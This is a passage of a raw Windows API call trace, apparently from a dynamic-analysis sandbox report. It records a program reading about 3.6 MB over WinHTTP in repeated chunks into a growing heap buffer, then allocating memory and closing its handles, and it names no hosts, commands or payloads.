lpBuffer=0xa216040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0226.258] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f50040, Size=0x2cb000) returned 0x9c80040 [0226.388] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f48840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f48840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0226.432] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2cd800) returned 0x9f50040 [0226.600] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa21b040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa21b040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0226.634] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f50040, Size=0x2d0000) returned 0xa220040 [0226.736] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa4ed840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa4ed840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0226.807] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0xa220040, Size=0x2d2800) returned 0x9c80040 [0226.918] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f50040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f50040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0226.957] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2d5000) returned 0x9f60040 [0227.050] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa232840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa232840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0227.051] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f60040, Size=0x2d7800) returned 0x9c80040 [0227.221] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f55040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f55040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0227.257] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2da000) returned 0x9f60040 [0227.446] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa237840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa237840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0227.519] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f60040, Size=0x2dc800) returned 0x9c80040 [0227.614] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f5a040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f5a040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0227.690] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2df000) returned 0x9f60040 [0227.810] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa23c840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa23c840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0227.849] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f60040, Size=0x2e1800) returned 0xa240040 [0227.975] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa51f040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa51f040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0228.045] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0xa240040, Size=0x2e4000) returned 0x9c80040 [0228.138] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f61840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f61840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0228.229] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2e6800) returned 0x9f70040 [0228.404] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa254040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa254040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0228.405] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f70040, Size=0x2e9000) returned 0x9c80040 [0228.540] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f66840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f66840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0228.541] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2eb800) returned 0x9f70040 [0228.726] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa259040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa259040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0228.727] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f70040, Size=0x2ee000) returned 0x9c80040 [0228.857] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f6b840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f6b840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0228.895] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2f0800) returned 0x9f70040 [0229.020] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa25e040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa25e040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0229.068] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f70040, Size=0x2f3000) returned 0xa270040 [0229.192] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa560840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa560840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0229.192] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0xa270040, Size=0x2f5800) returned 0x9c80040 [0229.284] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f73040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f73040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0229.285] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2f8000) returned 0x9f80040 [0229.678] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa275840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa275840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0229.679] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f80040, Size=0x2fa800) returned 0x9c80040 [0229.734] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f78040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f78040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0229.735] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2fd000) returned 0x9f80040 [0229.792] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa27a840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa27a840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0229.831] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f80040, Size=0x2ff800) returned 0x9c80040 [0229.908] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f7d040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f7d040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0229.909] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x302000) returned 0x9f80040 [0229.983] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa27f840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa27f840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0229.985] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f80040, Size=0x304800) returned 0xa290040 [0230.118] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa592040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa592040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0230.119] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0xa290040, Size=0x307000) returned 0x9c80040 [0230.201] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f84840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f84840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0230.202] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x309800) returned 0x9f90040 [0230.349] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa297040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa297040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0230.349] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f90040, Size=0x30c000) returned 0x9c80040 [0230.426] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f89840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f89840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0230.427] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x30e800) returned 0x9f90040 [0230.587] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa29c040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa29c040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0230.588] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f90040, Size=0x311000) returned 0xa2a0040 [0230.777] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa5ae840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa5ae840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0230.779] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0xa2a0040, Size=0x313800) returned 0x9c80040 [0230.881] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f91040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f91040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0230.937] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x316000) returned 0x9fa0040 [0231.069] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa2b3840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa2b3840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0231.069] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9fa0040, Size=0x318800) returned 0x9c80040 [0231.149] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f96040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f96040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0231.151] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x31b000) returned 0x9fa0040 [0231.304] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa2b8840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa2b8840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0231.305] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9fa0040, Size=0x31d800) returned 0x9c80040 [0231.466] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f9b040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f9b040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0231.467] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x320000) returned 0x9fa0040 [0231.606] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa2bd840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa2bd840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0231.606] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9fa0040, Size=0x322800) returned 0xa2d0040 [0231.758] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa5f0040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa5f0040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0231.796] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0xa2d0040, Size=0x325000) returned 0x9c80040 [0231.923] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9fa2840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fa2840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0231.924] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x327800) returned 0x9fb0040 [0232.028] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa2d5040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa2d5040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0232.029] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9fb0040, Size=0x32a000) returned 0x9c80040 [0232.300] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9fa7840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fa7840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0232.300] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x32c800) returned 0x9fb0040 [0232.510] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa2da040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa2da040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0232.510] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9fb0040, Size=0x32f000) returned 0x9c80040 [0232.703] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9fac840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fac840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0232.704] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x331800) returned 0x9fb0040 [0232.803] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa2df040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa2df040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0232.803] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9fb0040, Size=0x334000) returned 0xa2f0040 [0232.962] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa621840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa621840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0232.963] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0xa2f0040, Size=0x336800) returned 0x9c80040 [0233.121] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9fb4040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fb4040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0233.121] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x339000) returned 0x9fc0040 [0233.209] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa2f6840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa2f6840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0233.210] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9fc0040, Size=0x33b800) returned 0x9c80040 [0233.363] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9fb9040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fb9040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0233.364] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x33e000) returned 0x9fc0040 [0233.443] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa2fb840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa2fb840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0233.487] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9fc0040, Size=0x340800) returned 0xa300040 [0233.725] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa63e040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa63e040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0233.726] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0xa300040, Size=0x343000) returned 0x9c80040 [0233.952] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9fc0840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fc0840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0233.953] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x345800) returned 0x9fd0040 [0234.154] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa313040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa313040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0234.154] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9fd0040, Size=0x348000) returned 0x9c80040 [0234.419] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9fc5840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fc5840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0234.420] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x34a800) returned 0x9fd0040 [0234.776] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa318040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa318040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0234.776] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9fd0040, Size=0x34d000) returned 0x9c80040 [0234.935] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9fca840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fca840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0234.979] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x34f800) returned 0x9fd0040 [0235.127] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa31d040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa31d040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0235.129] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9fd0040, Size=0x352000) returned 0xa320040 [0235.360] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa66f840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa66f840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0235.362] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0xa320040, Size=0x354800) returned 0x9c80040 [0235.505] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9fd2040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fd2040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0235.506] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x357000) returned 0x9fe0040 [0235.704] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa334840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa334840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0235.706] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9fe0040, Size=0x359800) returned 0x9c80040 [0235.941] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9fd7040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fd7040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0235.943] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x35c000) returned 0x9fe0040 [0236.212] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa339840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa339840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0236.215] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9fe0040, Size=0x35e800) returned 0x9c80040 [0236.382] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9fdc040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fdc040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0236.394] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x361000) returned 0x9fe0040 [0236.723] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa33e840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa33e840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0236.725] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9fe0040, Size=0x363800) returned 0xa350040 [0236.991] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa6b1040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa6b1040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0236.992] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0xa350040, Size=0x366000) returned 0x9c80040 [0237.227] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9fe3840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fe3840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0237.228] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x368800) returned 0x9ff0040 [0237.331] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa356040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa356040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0237.333] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9ff0040, Size=0x36b000) returned 0x9c80040 [0237.503] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9fe8840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9fe8840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0237.503] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x36d800) returned 0x9ff0040 [0237.663] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa35b040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa35b040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0237.664] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9ff0040, Size=0x370000) returned 0xa360040 [0237.827] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa6cd840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa6cd840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0237.828] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0xa360040, Size=0x372800) returned 0x9c80040 [0238.001] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9ff0040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ff0040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0238.036] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x375000) returned 0xa000040 [0238.150] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa372840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa372840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0238.150] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0xa000040, Size=0x377800) returned 0x9c80040 [0238.295] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9ff5040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ff5040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0238.296] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x37a000) returned 0xa000040 [0238.398] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa377840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa377840*, lpdwNumberOfBytesRead=0x75df598*=0x1da8) returned 1 [0238.399] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0xa000040, Size=0x37c800) returned 0x9c80040 [0238.537] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9ff95e8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ff95e8*, lpdwNumberOfBytesRead=0x75df598*=0x0) returned 1 [0238.544] VirtualAlloc (lpAddress=0x0, dwSize=0x3795a8, flAllocationType=0x3000, flProtect=0x4) returned 0xa000000 [0238.705] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9c80040) returned 1 [0238.730] WinHttpCloseHandle (hInternet=0x3eeadd0) returned 1 [0238.730] WinHttpCloseHandle (hInternet=0x3faa0e0) returned 1 [0238.731] WinHttpCloseHandle (hInternet=0x3ea9ba0) returned 1 [0238.731] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80120) returned 0x10c [0238.731] 